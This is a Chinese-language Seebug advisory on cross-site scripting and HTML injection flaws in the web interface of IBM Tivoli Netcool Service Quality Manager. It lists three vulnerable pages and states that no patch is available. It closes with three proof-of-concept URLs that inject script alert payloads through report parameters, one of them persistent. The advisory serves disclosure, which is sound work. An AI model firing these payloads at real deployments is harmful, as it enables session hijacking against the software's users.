IBM Tivoli Netcool Service Quality Manager跨站脚本及HTML代码注入漏洞

2008-11-12T00:00:00
ID SSV:4432
Type seebug
Reporter Root
Modified 2008-11-12T00:00:00

Description

BUGTRAQ ID: 32233

IBM Tivoli Netcool Service Quality Manager是IBM Tivoli服务质量管理解决方案的核心软件。

Tivoli Netcool Service Quality Manager的Web接口中存在多个跨站脚本漏洞,已认证的用户可以使用报表生成功能创建名称中嵌入了恶意代码的报表,当在主面板中打开报表历史时就会在用户浏览器会话中执行注入的代码。

至少有以下三个页面存在漏洞:

  * http://server/<document root>/ReportTree
  * http://server/<document root>/Launch
  * http://server/<document root>/ReportRequest

IBM Tivoli Netcool Service Quality Manager IBM


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.ers.ibm.com/ target=_blank>http://www.ers.ibm.com/</a>

                                        
                                            
                                                http://server/&lt;document
root&gt;/ReportTree?action=generatedreportresults&amp;elementid=&quot;&gt;&lt;SCRIPT&gt;alert(&quot;Nonpersistant XSS&quot;);&lt;/SCRIPT&gt;&lt;!--&amp;date=0000000000000
http://server/&lt;document root&gt;/Launch?jnlpname==&quot;&gt;&lt;SCRIPT&gt;alert(&quot;NonPersistant XSS&quot;);&lt;/SCRIPT&gt;
http://server/&lt;document_root&gt;/ReportRequest?dateformat=dd%2FMM%2Fyyyy&amp;reporttitle=some_title&amp;reportID=some_stuff&amp;version=0&amp;treesrc=&amp;treetitle=&amp;p_wstring=&amp;p_dataperiod=none%3A%23%3Araw&amp;startdate=01%2F01%2F2008&amp;reporttype=offline&amp;%3Atasklabel=&lt;SCRIPT&gt;alert(Persistant XSS!);&lt;/SCRIPT&gt;&amp;none_agg_specified=false&amp;windowtype=main